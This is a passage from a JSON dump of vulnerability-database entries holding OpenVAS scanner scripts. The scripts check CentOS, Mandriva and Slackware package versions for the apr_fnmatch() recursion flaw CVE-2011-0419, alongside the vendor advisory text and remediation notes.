Arciemowicz for reporting this\n issue.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-May/017555.html\");\n script_id(880541);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0507\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos5 i386\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:57:56", "description": "Check for the Version of apr", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:881329", "href": "http://plugins.openvas.org/nasl.php?oid=881329", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n \n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\n\ntag_affected = \"apr on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-May/017556.html\");\n script_id(881329);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:25:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0507\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos5 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:08", "description": "Check for the Version of apr", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:881249", "href": "http://plugins.openvas.org/nasl.php?oid=881249", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n \n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\n\ntag_affected = \"apr on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-May/017553.html\");\n script_id(881249);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:11:51 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0507\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:32", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Mandriva Update for apr MDVSA-2011:084 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831393", "href": "http://plugins.openvas.org/nasl.php?oid=831393", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apr MDVSA-2011:084 (apr)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the &#039;*&#039; wildcard. An attacker\n could use this flaw to cause an application using this function,\n which also accepted untrusted input as a pattern for matching (such\n as an httpd server using the mod_autoindex module), to exhaust all\n stack memory or use an excessive amount of CPU time when performing\n matching (CVE-2011-0419).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-05/msg00005.php\");\n script_id(831393);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2011:084\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"Mandriva Update for apr MDVSA-2011:084 (apr)\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.4.2~1.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.9~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:29", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880563", "href": "http://plugins.openvas.org/nasl.php?oid=880563", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n \n Red Hat would like to thank Maksymilian Arciemowicz for reporting this\n issue.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-May/017554.html\");\n script_id(880563);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0507\");\n script_cve_id(\"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0507 centos4 i386\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~0.9.4~25.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:49", "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-133-01.", "cvss3": {}, "published": "2012-09-10T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2011-133-01 apr/apr-util ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:71948", "href": "http://plugins.openvas.org/nasl.php?oid=71948", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_133_01.nasl 6581 2017-07-06 13:58:51Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-133-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New apr and apr-util packages are available for Slackware 11.0, 12.0, 12.1,\n12.2, 13.0, 13.1, 13.37, and -current to fix a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2011-133-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-133-01\";\n \nif(description)\n{\n script_id(71948);\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 6581 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:58:51 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:17 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-133-01 apr/apr-util \");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880490", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880490", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 